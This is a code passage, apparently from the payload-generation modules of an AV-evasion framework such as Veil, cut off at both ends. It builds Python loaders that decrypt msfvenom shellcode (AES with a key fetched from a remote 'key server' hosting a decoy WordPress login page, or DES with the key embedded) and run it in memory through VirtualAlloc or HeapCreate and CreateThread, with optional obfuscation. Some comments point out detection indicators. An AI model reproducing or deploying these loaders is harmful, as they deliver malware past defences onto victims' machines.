                RandHttpstring = helpers.randomString()

                # Generate Random HTML code for webserver to host key file
                # Side effect: writes the decoy page. Plain open()/close() with no
                # with/try, so the handle leaks if write() raises.

                f = open(str(self.required_options["HTML_FILE_PATH"][0]) + target_html_file,'w')
                html_data = """
                <!DOCTYPE html>
                <!--[if IE 8]>
                        <html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en-US">
                    <![endif]-->
                <!--[if !(IE 8) ]><!-->
                <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US"><!--<![endif]--><head>


                <form name="loginform" id="loginform" action="http://mainpage/wp-login.php" method="post">
                    <p>
                        <label for="user_login">Username<br>
                        <input name="log" id="user_login" class="input" size="20" type="text"></label>
                    </p>
                    <p>
                        <label for="user_pass">Password<br>
                    <input name="pwd" id="user_pass" class="input" value="" size="20" type="password"></label>
                    </p>
                        <p class="forgetmenot"><label for="rememberme"><input name="rememberme" id="rememberme" value="forever" type="checkbox"> Remember Me</label></p>
                    <p class="submit">
                        <input name="wp-submit" id="wp-submit" class="button button-primary button-large" value="Log In" type="submit">
                        <input name="redirect_to" value="http://www.google.com" type="hidden">
                        <input name="testcookie" value="1" type="hidden">
                    </p>
                    </form>

                <p id="nav">
                <a rel="nofollow" href="http://www.google.com">Register</a> |   <a href="http://www.google.com" title="Password Lost and Found">Lost your password?</a>
                </p>


                    <p id="backtoblog"><a href="http://" title="Are you lost?">← Back to main page</a></p>

                    </div>

                        <div class="clear"></div>


                    </body></html>
                """
                html_data += '<!--'+ RandHttpstring +'-->'
                html_data = str(html_data)
                f.write(html_data)
                f.close()

                # encrypt the shellcode and grab the HTTP-Md5-Hex Key from new function
                # NOTE: `secret` is unpacked but not used in this branch; the generated
                # code derives the key from the fetched page at run time instead.
                (EncodedShellcode, secret) = encryption.encryptAES_http_request(Shellcode, html_data)

                # Create Payload code (Python 2 only: urllib2, md5, `except X, e`)
                PayloadCode =  'import ctypes\n'
                PayloadCode += 'from Crypto.Cipher import AES\n'
                PayloadCode += 'import base64\n'
                PayloadCode += 'import os\n'
                PayloadCode += 'import time\n'
                PayloadCode += 'import md5\n'
                PayloadCode += 'from urllib2 import Request, urlopen, URLError\n'
                # Define Target Server "Key hosting server"
                PayloadCode += RandKeyServer + ' = ' '"'+ TARGET_SERVER +'"' '\n'
                PayloadCode += 'while True:\n'
                PayloadCode += ' try:\n'
                # Open Target Server with HTTP GET request
                PayloadCode += '  ' + RandResponse + '= urlopen('+ RandKeyServer +') \n'
                # Check to see if server returns a 200 code or if not its most likely a 400 code
                PayloadCode += '  if ' + RandResponse + '.code == 200:\n'
                # Opening and requesting HTML from Target Server
                PayloadCode += '   '+ RandHttpKey + ' = urlopen('+ RandKeyServer +').read()\n'
                PayloadCode += '   '+ RandMD5 +' = md5.new()\n'
                PayloadCode += '   '+ RandHttpKey + ' = str(' + RandHttpKey + ')\n'
                # Generate MD5 hash of HTML on page
                PayloadCode += '   '+ RandMD5 +'.update('+ RandHttpKey +')\n'
                # Convert to 16 Byte Hex for AES functions
                PayloadCode += '   '+ RandHttpKey + ' = '+ RandMD5 +'.hexdigest()\n'
                # Convert to String for functions
                PayloadCode += '   '+ RandHttpKey + ' = str('+ RandHttpKey +')\n'
                # Break out to decryption
                PayloadCode += '   break\n'
                # At any point it fails you will be in sleep for supplied time
                PayloadCode += ' except URLError, e:\n'
                # SLEEP_TIME is spliced in verbatim; it is not validated as a number here.
                PayloadCode += '  time.sleep('+ self.required_options["SLEEP_TIME"][0] +')\n'
                PayloadCode += '  pass\n'
                # Execute Shellcode inject
                PayloadCode += RandPadding + ' = \'{\'\n'
                PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
                PayloadCode += RandCipherObject + ' = AES.new('+ RandHttpKey +')\n'
                PayloadCode += RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
                PayloadCode += RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n'
                PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + RandShellCode + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
                PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n'
                PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n'
                PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
                PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'

                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

        elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
                TARGET_SERVER = str(self.required_options["TARGET_SERVER"][0])
                target_html_file = str(TARGET_SERVER.split('/')[-1])

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate()

                # Generate Random Variable Names
                ShellcodeVariableName = helpers.randomString()
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                RandDecodeAES = helpers.randomString()
                RandCipherObject = helpers.randomString()
                RandDecodedShellcode = helpers.randomString()
                RandShellCode = helpers.randomString()  # unused in this branch
                RandPadding = helpers.randomString()
                RandToday = helpers.randomString()  # unused in this branch
                RandExpire = helpers.randomString()  # unused in this branch
                HeapVar = helpers.randomString()

                # Define Random Variable Names for HTTP functions
                RandResponse = helpers.randomString()
                RandHttpKey = helpers.randomString()
                RandMD5 = helpers.randomString()
                RandKeyServer = helpers.randomString()
                RandSleep = helpers.randomString()  # unused in this branch

                # Define Random Variable Names for HTML Functions
                RandHttpstring = helpers.randomString()

                # Generate Random HTML code for webserver to host key file
                # Same decoy-page write as the "virtual" branch (handle not protected by with/try).

                f = open(str(self.required_options["HTML_FILE_PATH"][0]) + target_html_file,'w')
                html_data = """
                <!DOCTYPE html>
                <!--[if IE 8]>
                        <html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en-US">
                    <![endif]-->
                <!--[if !(IE 8) ]><!-->
                <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US"><!--<![endif]--><head>


                <form name="loginform" id="loginform" action="http://mainpage/wp-login.php" method="post">
                    <p>
                        <label for="user_login">Username<br>
                        <input name="log" id="user_login" class="input" size="20" type="text"></label>
                    </p>
                    <p>
                        <label for="user_pass">Password<br>
                    <input name="pwd" id="user_pass" class="input" value="" size="20" type="password"></label>
                    </p>
                        <p class="forgetmenot"><label for="rememberme"><input name="rememberme" id="rememberme" value="forever" type="checkbox"> Remember Me</label></p>
                    <p class="submit">
                        <input name="wp-submit" id="wp-submit" class="button button-primary button-large" value="Log In" type="submit">
                        <input name="redirect_to" value="http://www.google.com" type="hidden">
                        <input name="testcookie" value="1" type="hidden">
                    </p>
                    </form>

                <p id="nav">
                <a rel="nofollow" href="http://www.google.com">Register</a> |   <a href="http://www.google.com" title="Password Lost and Found">Lost your password?</a>
                </p>


                    <p id="backtoblog"><a href="http://" title="Are you lost?">← Back to main page</a></p>

                    </div>

                        <div class="clear"></div>


                    </body></html>
                """
                html_data += '<!--'+ RandHttpstring +'-->'
                html_data = str(html_data)
                f.write(html_data)
                f.close()

                # encrypt the shellcode and grab the randomized key
                (EncodedShellcode, secret) = encryption.encryptAES_http_request(Shellcode, html_data)

                # Create Payload code (Python 2 only: urllib2, md5, `except X, e`)
                PayloadCode =  'import ctypes\n'
                PayloadCode += 'from Crypto.Cipher import AES\n'
                PayloadCode += 'import base64\n'
                PayloadCode += 'import os\n'
                PayloadCode += 'import time\n'
                PayloadCode += 'import md5\n'
                PayloadCode += 'from urllib2 import Request, urlopen, URLError\n'
                # Define Target Server "Key hosting server"
                PayloadCode += RandKeyServer + ' = ' '"'+ TARGET_SERVER +'"' '\n'
                PayloadCode += 'while True:\n'
                PayloadCode += ' try:\n'
                # Open Target Server with HTTP GET request
                PayloadCode += '  ' + RandResponse + '= urlopen('+ RandKeyServer +') \n'
                # Check to see if server returns a 200 code or if not its most likely a 400 code
                PayloadCode += '  if ' + RandResponse + '.code == 200:\n'
                # Opening and requesting HTML from Target Server
                PayloadCode += '   '+ RandHttpKey + ' = urlopen('+ RandKeyServer +').read()\n'
                PayloadCode += '   '+ RandMD5 +' = md5.new()\n'
                PayloadCode += '   '+ RandHttpKey + ' = str(' + RandHttpKey + ')\n'
                # Generate MD5 hash of HTML on page
                PayloadCode += '   '+ RandMD5 +'.update('+ RandHttpKey +')\n'
                # Convert to 16 Byte Hex for AES functions
                PayloadCode += '   '+ RandHttpKey + ' = '+ RandMD5 +'.hexdigest()\n'
                # Convert to String for functions
                PayloadCode += '   '+ RandHttpKey + ' = str('+ RandHttpKey +')\n'
                # Break out to decryption
                PayloadCode += '   break\n'
                # At any point it fails you will be in sleep for supplied time
                PayloadCode += ' except URLError, e:\n'
                # SLEEP_TIME is spliced in verbatim; it is not validated as a number here.
                PayloadCode += '  time.sleep('+ self.required_options["SLEEP_TIME"][0] +')\n'
                PayloadCode += '  pass\n'
                # Execute Shellcode inject
                PayloadCode += RandPadding + ' = \'{\'\n'
                PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
                # NOTE: unlike the "virtual" branch, the key is embedded as a literal here;
                # the md5 the generated code computes from the fetched page is never used.
                PayloadCode += RandCipherObject + ' = AES.new(\'' + secret + '\')\n'
                PayloadCode += RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
                PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n'
                PayloadCode += HeapVar + ' = ctypes.windll.kernel32.HeapCreate(ctypes.c_int(0x00040000),ctypes.c_int(len(' + ShellcodeVariableName + ') * 2),ctypes.c_int(0))\n'
                PayloadCode += RandPtr + ' = ctypes.windll.kernel32.HeapAlloc(ctypes.c_int(' + HeapVar + '),ctypes.c_int(0x00000008),ctypes.c_int(len( ' + ShellcodeVariableName + ')))\n'
                PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
                PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
                PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
                PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'

                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

        else:
            # NOTE: there is no else for EXPIRE_PAYLOAD != "x" below, so that
            # option combination falls off the end of the method and returns None.
            if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
                TARGET_SERVER = str(self.required_options["TARGET_SERVER"][0])
                target_html_file = str(TARGET_SERVER.split('/')[-1])
                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate()

                # Generate Random Variable Names
                ShellcodeVariableName = helpers.randomString()
                RandPtr = helpers.randomString()  # unused in this branch
                RandBuf = helpers.randomString()  # unused in this branch
                RandHt = helpers.randomString()  # unused in this branch
                RandDecodeAES = helpers.randomString()
                RandCipherObject = helpers.randomString()
                RandDecodedShellcode = helpers.randomString()
                RandShellCode = helpers.randomString()  # unused in this branch
                RandPadding = helpers.randomString()
                RandShellcode = helpers.randomString()
                RandReverseShell = helpers.randomString()  # unused in this branch
                RandMemoryShell = helpers.randomString()

                # Define Random Variable Names for HTTP functions
                RandResponse = helpers.randomString()
                RandHttpKey = helpers.randomString()
                RandMD5 = helpers.randomString()
                RandKeyServer = helpers.randomString()
                RandSleep = helpers.randomString()  # unused in this branch

                # Define Random Variable Names for HTML Functions
                RandHttpstring = helpers.randomString()

                # Generate Random HTML code for webserver to host key file
                # Same decoy-page write as the "virtual" branch (handle not protected by with/try).

                f = open(str(self.required_options["HTML_FILE_PATH"][0]) + target_html_file,'w')
                html_data = """
                <!DOCTYPE html>
                <!--[if IE 8]>
                        <html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en-US">
                    <![endif]-->
                <!--[if !(IE 8) ]><!-->
                <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US"><!--<![endif]--><head>


                <form name="loginform" id="loginform" action="http://mainpage/wp-login.php" method="post">
                    <p>
                        <label for="user_login">Username<br>
                        <input name="log" id="user_login" class="input" size="20" type="text"></label>
                    </p>
                    <p>
                        <label for="user_pass">Password<br>
                    <input name="pwd" id="user_pass" class="input" value="" size="20" type="password"></label>
                    </p>
                        <p class="forgetmenot"><label for="rememberme"><input name="rememberme" id="rememberme" value="forever" type="checkbox"> Remember Me</label></p>
                    <p class="submit">
                        <input name="wp-submit" id="wp-submit" class="button button-primary button-large" value="Log In" type="submit">
                        <input name="redirect_to" value="http://www.google.com" type="hidden">
                        <input name="testcookie" value="1" type="hidden">
                    </p>
                    </form>

                <p id="nav">
                <a rel="nofollow" href="http://www.google.com">Register</a> |   <a href="http://www.google.com" title="Password Lost and Found">Lost your password?</a>
                </p>


                    <p id="backtoblog"><a href="http://" title="Are you lost?">← Back to main page</a></p>

                    </div>

                        <div class="clear"></div>


                    </body></html>
                """
                html_data += '<!--'+ RandHttpstring +'-->'
                html_data = str(html_data)
                f.write(html_data)
                f.close()

                # encrypt the shellcode and grab the randomized key
                (EncodedShellcode, secret) = encryption.encryptAES_http_request(Shellcode, html_data)

                # Create Payload code (Python 2 only: urllib2, md5, `except X, e`)
                # The datetime imports are emitted but no expiry check is generated in this branch.
                PayloadCode = 'from ctypes import *\n'
                PayloadCode += 'from Crypto.Cipher import AES\n'
                PayloadCode += 'import base64\n'
                PayloadCode += 'import os\n'
                PayloadCode += 'import time\n'
                PayloadCode += 'import md5\n'
                PayloadCode += 'from urllib2 import Request, urlopen, URLError\n'
                PayloadCode += 'from datetime import datetime\n'
                PayloadCode += 'from datetime import date\n\n'
                # Define Target Server "Key hosting server"
                PayloadCode += RandKeyServer + ' = ' '"'+ TARGET_SERVER +'"' '\n'
                PayloadCode += 'while True:\n'
                PayloadCode += ' try:\n'
                # Open Target Server with HTTP GET request
                PayloadCode += '  ' + RandResponse + '= urlopen('+ RandKeyServer +') \n'
                # Check to see if server returns a 200 code or if not its most likely a 400 code
                PayloadCode += '  if ' + RandResponse + '.code == 200:\n'
                # Opening and requesting HTML from Target Server
                PayloadCode += '   '+ RandHttpKey + ' = urlopen('+ RandKeyServer +').read()\n'
                PayloadCode += '   '+ RandMD5 +' = md5.new()\n'
                PayloadCode += '   '+ RandHttpKey + ' = str(' + RandHttpKey + ')\n'
                # Generate MD5 hash of HTML on page
                PayloadCode += '   '+ RandMD5 +'.update('+ RandHttpKey +')\n'
                # Convert to 16 Byte Hex for AES functions
                PayloadCode += '   '+ RandHttpKey + ' = '+ RandMD5 +'.hexdigest()\n'
                # Convert to String for functions
                PayloadCode += '   '+ RandHttpKey + ' = str('+ RandHttpKey +')\n'
                # Break out to decryption
                PayloadCode += '   break\n'
                # At any point it fails you will be in sleep for supplied time
                PayloadCode += ' except URLError, e:\n'
                # SLEEP_TIME is spliced in verbatim; it is not validated as a number here.
                PayloadCode += '  time.sleep('+ self.required_options["SLEEP_TIME"][0] +')\n'
                PayloadCode += '  pass\n'
                PayloadCode += RandPadding + ' = \'{\'\n'
                PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
                # NOTE: as in the "heap" branch, the key is embedded as a literal; the
                # fetched-page md5 computed above is never used by the generated code.
                PayloadCode += RandCipherObject + ' = AES.new(\'' + secret + '\')\n'
                PayloadCode += RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
                PayloadCode += ShellcodeVariableName + ' = ' + RandDecodedShellcode + '.decode("string_escape")\n'
                PayloadCode += RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n'
                PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
                PayloadCode += RandShellcode + '()'

                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode
Example #20
    def generate(self):
        """Build the Python 2 loader source for this payload and return it as a string.

        Dispatches on three ``required_options`` entries (each read as
        ``self.required_options[name][0]``):

        * ``inject_method`` -- ``"virtual"`` emits a VirtualAlloc/RtlMoveMemory/
          CreateThread loader, ``"heap"`` a HeapCreate/HeapAlloc/CreateThread
          loader, and any other value a ``ctypes`` ``create_string_buffer`` +
          ``cast`` to a function pointer.
        * ``expire_payload`` -- ``"x"`` for no expiry; otherwise it is parsed as
          an integer number of days, and the emitted loader only runs while
          ``datetime.now()`` is before midnight of today + that many days.
        * ``use_pyherion`` -- ``"y"`` passes the finished source through
          ``encryption.pyherion``.

        The shellcode comes from ``self.shellcode.generate()`` and is encrypted
        with ``encryption.encryptDES``, which returns the ciphertext together
        with the (key, iv) pair it used.  Both the key and the IV are written
        into the emitted source as plain string literals next to the
        ciphertext, so the DES layer is obfuscation only, not confidentiality:
        anyone holding the generated file (an analyst, a sandbox, an EDR
        script-content scan) can recover the shellcode without any secret.

        The emitted code is Python 2 only: it relies on the ``string_escape``
        codec and on ``from Crypto.Cipher import DES``.  Every branch returns,
        so the method always yields a string.

        Returns:
            str: the generated loader source.
        """
        if self.required_options["inject_method"][0].lower() == "virtual":
            if self.required_options["expire_payload"][0].lower() == "x":

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate()

                # Generate Random Variable Names
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                ShellcodeVariableName = helpers.randomString()
                RandIV = helpers.randomString()
                RandDESKey = helpers.randomString()
                RandDESPayload = helpers.randomString()
                RandEncShellCodePayload = helpers.randomString()

                # encrypt the shellcode and get our randomized key/iv
                (EncShellCode, (DESKey, iv)) = encryption.encryptDES(Shellcode)

                # Create Payload File
                # detection note: the import lines and the "avlol" alias are fixed
                # text in every file this branch emits; only identifiers vary.
                PayloadCode = "from Crypto.Cipher import DES\n"
                PayloadCode += "import ctypes as avlol\n"
                # key and IV are embedded in the clear -- see the docstring
                PayloadCode += RandIV + " = '" + iv + "'\n"
                PayloadCode += RandDESKey + " = '" + DESKey + "'\n"
                PayloadCode += RandDESPayload + " = DES.new(" + RandDESKey + ", DES.MODE_CFB, " + RandIV + ")\n"
                # string_escape round-trips the raw ciphertext bytes through a Python 2 literal
                PayloadCode += RandEncShellCodePayload + " = '" + EncShellCode.encode("string_escape") + "'\n"
                PayloadCode += (
                    ShellcodeVariableName
                    + " = bytearray("
                    + RandDESPayload
                    + ".decrypt("
                    + RandEncShellCodePayload
                    + ").decode('string_escape'))\n"
                )
                # 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE:
                # an RWX private allocation, the classic memory-scanner indicator.
                PayloadCode += (
                    RandPtr
                    + " = avlol.windll.kernel32.VirtualAlloc(avlol.c_int(0),avlol.c_int(len("
                    + ShellcodeVariableName
                    + ")),avlol.c_int(0x3000),avlol.c_int(0x40))\n"
                )
                PayloadCode += (
                    RandBuf
                    + " = (avlol.c_char * len("
                    + ShellcodeVariableName
                    + ")).from_buffer("
                    + ShellcodeVariableName
                    + ")\n"
                )
                PayloadCode += (
                    "avlol.windll.kernel32.RtlMoveMemory(avlol.c_int("
                    + RandPtr
                    + "),"
                    + RandBuf
                    + ",avlol.c_int(len("
                    + ShellcodeVariableName
                    + ")))\n"
                )
                PayloadCode += (
                    RandHt
                    + " = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int("
                    + RandPtr
                    + "),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n"
                )
                # -1 == INFINITE: the loader blocks on the thread for its whole lifetime
                PayloadCode += "avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(" + RandHt + "),avlol.c_int(-1))"

                if self.required_options["use_pyherion"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

            else:

                # Get our current date and add number of days to the date
                # str(date) is ISO "YYYY-MM-DD"; [2:] below drops the century so the
                # emitted strptime("%y-%m-%d") matches.  A non-integer option value
                # raises ValueError here.
                todaysdate = date.today()
                expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate()

                # Generate Random Variable Names
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                ShellcodeVariableName = helpers.randomString()
                RandIV = helpers.randomString()
                RandDESKey = helpers.randomString()
                RandDESPayload = helpers.randomString()
                RandEncShellCodePayload = helpers.randomString()
                RandToday = helpers.randomString()
                RandExpire = helpers.randomString()

                # encrypt the shellcode and get our randomized key/iv
                (EncShellCode, (DESKey, iv)) = encryption.encryptDES(Shellcode)

                # Create Payload File
                PayloadCode = "from Crypto.Cipher import DES\n"
                PayloadCode += "import ctypes as avlol\n"
                PayloadCode += "from datetime import datetime\n"
                PayloadCode += "from datetime import date\n\n"
                PayloadCode += RandToday + " = datetime.now()\n"
                # strptime yields midnight of the expiry day, so the loader is inert
                # from 00:00 on that day (the last day is excluded).  The check is
                # against the host's local clock and is trivially bypassed by
                # setting it back -- an analyst can always run the sample.
                PayloadCode += RandExpire + ' = datetime.strptime("' + expiredate[2:] + '","%y-%m-%d") \n'
                PayloadCode += "if " + RandToday + " < " + RandExpire + ":\n"
                # key and IV are embedded in the clear -- see the docstring
                PayloadCode += "\t" + RandIV + " = '" + iv + "'\n"
                PayloadCode += "\t" + RandDESKey + " = '" + DESKey + "'\n"
                PayloadCode += "\t" + RandDESPayload + " = DES.new(" + RandDESKey + ", DES.MODE_CFB, " + RandIV + ")\n"
                PayloadCode += "\t" + RandEncShellCodePayload + " = '" + EncShellCode.encode("string_escape") + "'\n"
                PayloadCode += (
                    "\t"
                    + ShellcodeVariableName
                    + " = bytearray("
                    + RandDESPayload
                    + ".decrypt("
                    + RandEncShellCodePayload
                    + ").decode('string_escape'))\n"
                )
                # 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE (RWX)
                PayloadCode += (
                    "\t"
                    + RandPtr
                    + " = avlol.windll.kernel32.VirtualAlloc(avlol.c_int(0),avlol.c_int(len("
                    + ShellcodeVariableName
                    + ")),avlol.c_int(0x3000),avlol.c_int(0x40))\n"
                )
                PayloadCode += (
                    "\t"
                    + RandBuf
                    + " = (avlol.c_char * len("
                    + ShellcodeVariableName
                    + ")).from_buffer("
                    + ShellcodeVariableName
                    + ")\n"
                )
                PayloadCode += (
                    "\tavlol.windll.kernel32.RtlMoveMemory(avlol.c_int("
                    + RandPtr
                    + "),"
                    + RandBuf
                    + ",avlol.c_int(len("
                    + ShellcodeVariableName
                    + ")))\n"
                )
                PayloadCode += (
                    "\t"
                    + RandHt
                    + " = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int("
                    + RandPtr
                    + "),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n"
                )
                PayloadCode += (
                    "\tavlol.windll.kernel32.WaitForSingleObject(avlol.c_int(" + RandHt + "),avlol.c_int(-1))"
                )

                if self.required_options["use_pyherion"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

        # Reached only when inject_method is not "virtual" (both branches above return).
        if self.required_options["inject_method"][0].lower() == "heap":
            if self.required_options["expire_payload"][0].lower() == "x":

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate()

                # Generate Random Variable Names
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                ShellcodeVariableName = helpers.randomString()
                RandIV = helpers.randomString()
                RandDESKey = helpers.randomString()
                RandDESPayload = helpers.randomString()
                RandEncShellCodePayload = helpers.randomString()
                HeapVar = helpers.randomString()

                # encrypt the shellcode and get our randomized key/iv
                (EncShellCode, (DESKey, iv)) = encryption.encryptDES(Shellcode)

                # Create Payload File
                PayloadCode = "from Crypto.Cipher import DES\n"
                PayloadCode += "import ctypes as avlol\n"
                # key and IV are embedded in the clear -- see the docstring
                PayloadCode += RandIV + " = '" + iv + "'\n"
                PayloadCode += RandDESKey + " = '" + DESKey + "'\n"
                PayloadCode += RandDESPayload + " = DES.new(" + RandDESKey + ", DES.MODE_CFB, " + RandIV + ")\n"
                PayloadCode += RandEncShellCodePayload + " = '" + EncShellCode.encode("string_escape") + "'\n"
                PayloadCode += (
                    ShellcodeVariableName
                    + " = bytearray("
                    + RandDESPayload
                    + ".decrypt("
                    + RandEncShellCodePayload
                    + ").decode('string_escape')"
                    + ")\n"
                ) if False else PayloadCode
                PayloadCode += (
                    ShellcodeVariableName
                    + " = bytearray("
                    + RandDESPayload
                    + ".decrypt("
                    + RandEncShellCodePayload
                    + ").decode('string_escape'))\n"
                )
                # 0x00040000 = HEAP_CREATE_ENABLE_EXECUTE: a private executable heap,
                # sized at twice the shellcode length.  Executable heaps are rare in
                # legitimate processes and a strong memory-scanner signal.
                PayloadCode += (
                    HeapVar
                    + " = avlol.windll.kernel32.HeapCreate(avlol.c_int(0x00040000),avlol.c_int(len("
                    + ShellcodeVariableName
                    + ") * 2),avlol.c_int(0))\n"
                )
                # 0x00000008 = HEAP_ZERO_MEMORY
                PayloadCode += (
                    RandPtr
                    + " = avlol.windll.kernel32.HeapAlloc(avlol.c_int("
                    + HeapVar
                    + "),avlol.c_int(0x00000008),avlol.c_int(len( "
                    + ShellcodeVariableName
                    + ")))\n"
                )
                PayloadCode += (
                    RandBuf
                    + " = (avlol.c_char * len("
                    + ShellcodeVariableName
                    + ")).from_buffer("
                    + ShellcodeVariableName
                    + ")\n"
                )
                PayloadCode += (
                    "avlol.windll.kernel32.RtlMoveMemory(avlol.c_int("
                    + RandPtr
                    + "),"
                    + RandBuf
                    + ",avlol.c_int(len("
                    + ShellcodeVariableName
                    + ")))\n"
                )
                PayloadCode += (
                    RandHt
                    + " = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int("
                    + RandPtr
                    + "),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n"
                )
                PayloadCode += "avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(" + RandHt + "),avlol.c_int(-1))"

                if self.required_options["use_pyherion"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

            else:

                # Get our current date and add number of days to the date
                # (see the "virtual" expiry branch for the date-format and clock caveats)
                todaysdate = date.today()
                expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate()

                # Generate Random Variable Names
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                ShellcodeVariableName = helpers.randomString()
                RandIV = helpers.randomString()
                RandDESKey = helpers.randomString()
                RandDESPayload = helpers.randomString()
                RandEncShellCodePayload = helpers.randomString()
                HeapVar = helpers.randomString()
                RandToday = helpers.randomString()
                RandExpire = helpers.randomString()

                # encrypt the shellcode and get our randomized key/iv
                (EncShellCode, (DESKey, iv)) = encryption.encryptDES(Shellcode)

                # Create Payload File
                PayloadCode = "from Crypto.Cipher import DES\n"
                PayloadCode += "import ctypes as avlol\n"
                PayloadCode += "from datetime import datetime\n"
                PayloadCode += "from datetime import date\n\n"
                PayloadCode += RandToday + " = datetime.now()\n"
                PayloadCode += RandExpire + ' = datetime.strptime("' + expiredate[2:] + '","%y-%m-%d") \n'
                PayloadCode += "if " + RandToday + " < " + RandExpire + ":\n"
                # key and IV are embedded in the clear -- see the docstring
                PayloadCode += "\t" + RandIV + " = '" + iv + "'\n"
                PayloadCode += "\t" + RandDESKey + " = '" + DESKey + "'\n"
                PayloadCode += "\t" + RandDESPayload + " = DES.new(" + RandDESKey + ", DES.MODE_CFB, " + RandIV + ")\n"
                PayloadCode += "\t" + RandEncShellCodePayload + " = '" + EncShellCode.encode("string_escape") + "'\n"
                PayloadCode += (
                    "\t"
                    + ShellcodeVariableName
                    + " = bytearray("
                    + RandDESPayload
                    + ".decrypt("
                    + RandEncShellCodePayload
                    + ").decode('string_escape'))\n"
                )
                # 0x00040000 = HEAP_CREATE_ENABLE_EXECUTE (executable private heap)
                PayloadCode += (
                    "\t"
                    + HeapVar
                    + " = avlol.windll.kernel32.HeapCreate(avlol.c_int(0x00040000),avlol.c_int(len("
                    + ShellcodeVariableName
                    + ") * 2),avlol.c_int(0))\n"
                )
                # 0x00000008 = HEAP_ZERO_MEMORY
                PayloadCode += (
                    "\t"
                    + RandPtr
                    + " = avlol.windll.kernel32.HeapAlloc(avlol.c_int("
                    + HeapVar
